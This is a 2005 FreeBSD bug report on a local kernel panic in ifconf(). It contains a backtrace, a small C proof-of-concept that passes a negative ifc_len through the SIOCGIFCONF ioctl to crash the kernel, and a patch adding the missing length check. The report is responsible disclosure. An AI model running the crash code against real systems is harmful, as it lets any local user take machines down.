kern/77424: [PATCH] Local DoS from user-space in ifconf()
Wojciech A. Koszek
dunstan at FreeBSD.czest.pl
Sat Feb 12 10:30:21 PST 2005
>Number: 77424
>Category: kern
>Synopsis: [PATCH] Local DoS from user-space in ifconf()
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Sat Feb 12 18:30:20 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator: Wojciech A. Koszek
>Release: FreeBSD 5.3-STABLE i386
>Organization:
>Environment:
System: FreeBSD dunstan.freebsd.czest.pl 5.3-STABLE FreeBSD 5.3-STABLE #0: Sat Feb 12 11:15:23 CET 2005 root at dunstan.freebsd.czest.pl:/usr/obj/usr/src/sys/HOME6 i386
--
kern.ostype: FreeBSD
kern.osrelease: 5.3-STABLE
kern.osrevision: 199506
kern.version: FreeBSD 5.3-STABLE #0: Sat Feb 12 11:15:23 CET 2005
root at dunstan.freebsd.czest.pl:/usr/obj/usr/src/sys/HOME6
--
kern.ostype: FreeBSD
kern.osrelease: 6.0-CURRENT
kern.osrevision: 199506
kern.version: FreeBSD 6.0-CURRENT #2: Sat Feb 12 10:43:18 UTC 2005
root@:/usr/obj/usr/src/sys/GENERIC
--
>Description:
Bug exists in /usr/src/sys/net/if.c, function ifconf(), because only
partial validity check is done on data passed from user-space. This lets
every user to cause kernel panic by supplying maliciuos values (ifc_len
from ifconf structure to numbers < 0) and calling ioctl with SIOCGIFCONF
argument:
panic: wrote past end of sbuf (0 >= 0)
KDB: stack backtrace:
panic(c0663212,0,0,d94b0bd8,c04f6a8f) at panic+0xeb
_assert_sbuf_integrity(c1a2a4a0,c1a2a400,c1bfb2e0,d94b0c34,c053dc99) at _assert_
sbuf_integrity+0x3b
sbuf_bcat(c1bfb2e0,d94b0c08,10,1,0) at sbuf_bcat+0x1b
ifconf(c1c86dec,c0086924,d94b0c60,c1bd1780,c1bd1780) at ifconf+0x129
ioctl(c1bd1780,d94b0d14,3,0,292) at ioctl+0x11e
syscall(2f,2f,2f,0,bfbfecc8) at syscall+0x128
Xint0x80_syscall() at Xint0x80_syscall+0x1f
--- syscall (54, FreeBSD ELF32, ioctl), eip = 0x8048517, esp = 0xbfbfe81c, ebp =
0xbfbfec78 ---
Uptime: 4m38s
>How-To-Repeat:
Attached code [ifconftest.c] should panic your kernel:
$ gcc ifconftest.c -o ifconftest
$ ./ifconftest
>Fix:
Attached patch [diff.0.if.c] corrects this problem (-STABLE and -CURRENT).
Patch should be tested.
--- ifconftest.c begins here ---
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
int
main ()
{
struct ifreq iq;
struct ifconf ic;
int s, error = 0;
char buf[1024];
s = socket(AF_INET, SOCK_DGRAM, 0);
if (s == -1)
exit(1);
bzero(&iq, sizeof(iq));
bzero(&ic, sizeof(ic));
strncpy(iq.ifr_name, "lo0", sizeof(iq.ifr_name));
ic.ifc_len = -100;
ic.ifc_buf = buf;
error = ioctl(s, SIOCGIFCONF, (caddr_t) &ic);
if (error)
errx(1, "%s[%d]\n", strerror(errno), errno);
printf("%s\n", buf);
exit(0);
}
--- ifconftest.c ends here ---
--- diff.0.if.c begins here ---
Fixes leak in ifconf() when ioctl(2) is called with SIOCGIFCONF and length
of request equal to -1
diff -upr /usr/src/sys/net/if.c src/sys/net/if.c
--- /usr/src/sys/net/if.c Thu Nov 11 12:34:14 2004
+++ src/sys/net/if.c Sun Nov 21 00:42:56 2004
@@ -1508,6 +1508,8 @@ ifconf(u_long cmd, caddr_t data)
max_len = MAXPHYS - 1;
again:
+ if (ifc->ifc_len <= 0)
+ return (EINVAL);
if (ifc->ifc_len <= max_len) {
max_len = ifc->ifc_len;
full = 1;
--- diff.0.if.c ends here ---
>Release-Note:
>Audit-Trail:
>Unformatted:
critical
medium
More information about the freebsd-bugs
mailing list